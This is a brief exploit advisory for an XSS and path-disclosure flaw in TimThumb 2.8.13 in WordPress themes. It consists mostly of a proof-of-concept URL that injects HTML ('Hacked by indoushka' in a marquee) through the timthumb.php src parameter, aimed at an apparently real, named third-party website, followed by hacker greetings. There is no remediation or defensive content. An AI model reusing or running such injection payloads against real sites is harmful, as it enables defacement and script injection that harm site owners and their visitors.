========================================================================
| # Title : TimThumb version 2.8.13 XSS / Path Disclosure vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : 2.8.13
| # Vendor : https://code.google.com/p/timthumb/
| # Dork : n/a
========================================================================
poc :
http://www.med-rp.com//wp-content/themes/qualifire/scripts/timthumb.php?h=157&q=80&src=http://med-rp.com/wp-content/uploads/2011/04/logo.png%27%22()%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&w=250&zc=1
Greetz : ===============================================================
|
jericho * Larry W. Cashdollar * shadow_00715 * Gjoko Krstic |
|
========================================================================